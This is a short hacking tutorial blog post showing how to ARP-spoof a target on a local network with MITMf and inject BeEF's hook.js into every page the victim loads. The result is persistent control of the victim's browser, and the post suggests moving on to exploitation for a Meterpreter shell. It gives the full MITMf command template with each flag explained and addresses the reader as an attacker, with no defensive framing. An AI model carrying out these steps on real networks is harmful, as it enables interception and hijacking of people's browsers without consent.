Hook Web Browsers with MITMf and BeEF

Hook Web Browsers with MITMf and BeEF

Do you remember the last time we used BeEF? Well, now we get to use it again, but this time with MITMf! We are going to auto-inject the hooking script into every webpage the victim visits!

Requirements

If you don't already have it, install MITMf via apt-get install mitmf. You might want to apt-get update first. If you want to, you can clone it from the Git repository (git clone https://github.com/byt3bl33d3r/MITMf), but I've had trouble with that version.
BeEF should already be installed in Kali/Back|Track.

Step 1Start BeEF

Open a new terminal and type cd /usr/share/beef-xss/.
As you can see, we have BeEF installed, and we can go ahead and run it by typing ./beef. You should get this output:
Do you see the Hook URL? That's important. Remember or copy the URL provided.

Step 2Open the Panel

Now you can open the BeEF web panel with the UI URL. Once presented with the login page, you should just be able to get in with the default credentials "beef" for both the username and password. Once inside the UI, you should have this screen:

Step 3Inject the Hook.js Script

Open up a new terminal. We'll be using MITMf to inject the hooking script. Use mitmf --spoof --arp -i <interface> --gateway <router IP> --target <target IP> --inject --js-url <hook.js URL> as the format.
  • --spoof loads the spoof plugin
  • --arp redirects ARP packets
  • -i specifies the interface to inject packets on
  • --gateway sets the IP of your router to redirect through
  • --target sets the target IP to inject the hook.js script
  • --inject loads the inject function
  • --js-url specifies the JavaScript code to inject
For instance, I use this command:
Run the command and MITMf should start giving you some output.
MITMf is telling us that it has successfully injected the hook.js script into the websites that the target visited.

Step 4Back to BeEF

If we check our BeEF panel, you will see the hooked computer right on the Online Browsers tab.
Remember in my previous XSS posts where I said the victim must stay on the webpage for you to have control of it? Guess what? You don't have to worry about that now! MITMf will continue injecting the script into every website the victim visits, so you'll never lose control!

Conclusion

Now we know what power lies within MITMf... we can do so much more. From there, you can continue trying to exploit the victim machine, and maybe get a Meterpreter prompt! Ah, the joy of MitM attacks...
NOTE: This only works with non-HSTS websites. You could try the --hsts function, but it might make things too slow and/or glitchy.

Comments

Post a Comment